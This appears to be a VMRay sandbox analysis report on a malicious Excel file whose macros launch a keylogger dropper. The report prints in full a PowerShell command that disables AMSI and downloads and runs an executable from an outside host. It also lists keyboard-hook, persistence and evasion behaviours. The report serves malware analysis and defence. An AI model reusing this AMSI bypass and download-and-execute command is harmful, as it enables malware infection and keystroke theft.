Excel File Executes PowerShell to Download/Execute .Net Key Logger | VTI
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win7_64_sp1-mso2007 | ms_office
Classification: Trojan, Dropper, Keylogger, Downloader

49d9e68dbb6a4bfc5122545b2150adfc3b0ac99f717a1676a5de1e6865c8143b (SHA256)

share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls

Excel Document

Created at 2018-04-18 14:33:00

Severity Category Operation Classification
4/5
Process Creates process -
  • Creates process "powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA + '\aap6.exe') {Remove-Item $env:APPDATA + '\aap6.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://3lionsfactory.ga/out/linit.exe', $env:APPDATA + '\aap6.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\aap6.exe'); Stop-Process -Id $Pid -Force".
4/5
Device Monitors keyboard input Keylogger
  • Installs system wide "WH_KEYBOARD_LL" hook(s) to monitor keystrokes.
4/5
File System Associated with malicious files Trojan
  • File "c:\users\kft6utqw\desktop\share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls" is a known malicious file.
  • File "c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe" is a known malicious file.
4/5
Network Downloads data Downloader
3/5
Network Performs DNS request -
3/5
Persistence Installs system startup script or application -
  • Adds "C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe" to Windows startup via registry.
3/5
Network Checks external IP address -
  • Checks external IP by asking IP info service at "checkip.dyndns.org/".
3/5
PE Executes dropped PE file -
  • Executes dropped file "c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe".
2/5
Network Associated with known malicious/suspicious URLs -
2/5
Network Connects to HTTP server -
2/5
PE Drops PE file Dropper
  • Drops file "c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe".
2/5
VBA Macro Creates suspicious COM object -
  • CreateObject(NPL_IO("7470808F868D914B7085828989"))
1/5
Process Creates system object -
1/5
VBA Macro Executes macro on specific worksheet event -
  • Executes macro on "Activate Workbook" event.
  • Executes macro on "Open Workbook" event.
  • Executes macro on "Open Document" event.
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image